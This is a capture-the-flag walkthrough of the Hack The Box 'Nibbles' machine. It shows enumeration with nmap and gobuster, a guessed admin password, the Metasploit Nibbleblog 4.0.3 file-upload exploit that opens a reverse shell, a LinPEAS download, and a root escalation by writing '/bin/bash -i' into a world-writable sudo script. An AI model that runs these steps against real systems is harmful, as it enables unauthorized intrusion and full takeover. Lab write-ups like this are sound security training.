We start our exploration by scanning the target:
nmap -sV -sC -p- "10.10.10.75" -oA nmap_scan
We got the following output:
Starting Nmap 7.93 ( https://nmap.org ) at 2024-09-21 18:11 CEST
Nmap scan report for 10.10.10.75
Host is up (0.10s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 c4f8ade8f80477decf150d630a187e49 (RSA)
| 256 228fb197bf0f1708fc7e2c8fe9773a48 (ECDSA)
|_ 256 e6ac27a3b5a9f1123c34a55d5beb3de9 (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 195.67 seconds
Since there is an HTTP
server running on port 80, let’s navigate to http://10.10.10.75/
, there is not a lot to see here so let’s inspect the source code by hitting Ctrl + U
.
At the bottom, we can see the following:
<!-- /nibbleblog/ directory. Nothing interesting here! -->
Seems to be an interesting page to navigate, let’s see if it exists.
We can see in the bottom-right corner Powered by Nibbleblog
and by searching the web, we can find the Nibbleblog CMS.
From here, we can look to the different links on the page and nothing seems to be interesting. We can try to enumerate sub directories or look into the CMS to understand how folders and files are structured.
gobuster dir -w /usr/share/wfuzz/general/common.txt -u http://$TARGET/nibbleblog/
This gives the following output :
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.10.10.75/nibbleblog/
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wfuzz/general/common.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/admin (Status: 301) [Size: 321] [--> http://10.10.10.75/nibbleblog/admin/]
/content (Status: 301) [Size: 323] [--> http://10.10.10.75/nibbleblog/content/]
Progress: 951 / 952 (99.89%)
===============================================================
Finished
===============================================================
By navigating to /content/
, we find the /private/
folder and inside we discover the following user.xml
file :
<users>
<user username="admin">
<id type="integer">0</id>
<session_fail_count type="integer">0</session_fail_count>
<session_date type="integer">1514544131</session_date>
</user>
<blacklist type="string" ip="10.10.10.1">
<date type="integer">1512964659</date>
<fail_count type="integer">1</fail_count>
</blacklist>
</users>
So now we know the admin user login with the username admin
.
By looking to the CMS files and folders, we can see that there should be an /admin.php
page which could be the login page for the administration panel.
This page is effectively here and we can see a login form that we can use with our admin
username that we found earlier. Since we don’t have the password we could try to use a dictionary attack with Hydra
, but it seems that some blacklisting mechanisms are used there to prevent this kind of attack.
Since it is an easy box on Hack the Box, let’s simply try the name of the box as the password : nibbles
(not guessing here, just a habit from Hack the Box).
It worked ! While in, let’s check what is the running version of Nibbleblog. We can do this by going to the Settings
page and scrolling down on the page to reveal Nibbleblog 4.0.3 "Coffee" - Developed by Diego Najar
.
With this information, let’s search for any known exploit :
searchsploit "nibbleblog 4.0.3"
This displays the following output :
-------------------------------------------------------- ---------------------
Exploit Title | Path
-------------------------------------------------------- ---------------------
Nibbleblog 4.0.3 - Arbitrary File Upload (Metasploit) | php/remote/38489.rb
-------------------------------------------------------- ---------------------
Let’s run Metasploit :
msfconsole -q
In the msfconsole
, we can run the following commands :
search nibbleblog
use exploit/multi/http/nibbleblog_file_upload
show options
set PASSWORD "nibbles"
set RHOSTS "10.10.10.75"
set TARGETURI "/nibbleblog"
set USERNAME "admin"
check
run
I used a Meterpreter payload for this one configured with my IP (VPN) and a listening port for the reverse TCP connection.
When we receive the reverse shell, we can directly try to identify who we are running our commands as:
getuid
This outputs : Server username: nibbler
Let’s list the content in that user’s home directory :
ls /home/nibbler
Here is the command output:
Listing: /home/nibbler
======================
Mode Size Type Last modified Name
---- ---- ---- ------------- ----
100600/rw------- 0 fil 2017-12-29 11:29:56 +0100 .bash_history
040775/rwxrwxr-x 4096 dir 2017-12-11 04:04:04 +0100 .nano
100400/r-------- 1855 fil 2017-12-11 04:07:21 +0100 personal.zip
100400/r-------- 33 fil 2024-09-21 13:32:33 +0200 user.txt
And here we have our user flag. Now let’s look for privilege escalation.
I’ll first start by getting the LinPEAS script on my machine (in another terminal):
wget https://github.com/peass-ng/PEASS-ng/releases/latest/download/linpeas.sh
And in Meterpreter :
upload linpeas.sh /tmp/linpeas.sh
shell
bash /tmp/linpeas.sh
Among the results we have, we can see the following output :
Matching Defaults entries for nibbler on Nibbles:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User nibbler may run the following commands on Nibbles:
(root) NOPASSWD: /home/nibbler/personal/stuff/monitor.sh
This seems to be very interesting. In nibbler’s home directory, we don’t have the personal
folder but we have a Zip file personal.zip
. Let’s unpack it :
unzip personal.zip
We can now see the permissions that we have on this file :
ls -al ~/personal/stuff
This gives us the following output :
total 12
drwxr-xr-x 2 nibbler nibbler 4096 Dec 10 2017 .
drwxr-xr-x 3 nibbler nibbler 4096 Dec 10 2017 ..
-rwxrwxrwx 1 nibbler nibbler 4015 May 8 2015 monitor.sh
This file has the 777
permissions, which means read, write and execute for everyone. We already know that we can execute it as root without a password. Let’s simply modify it :
echo "/bin/bash -i" > ~/personal/stuff/monitor.sh
And finally we run it :
sudo ~/personal/stuff/monitor.sh
We are now root on the machine and we can grab the root flag in /root/root.txt
.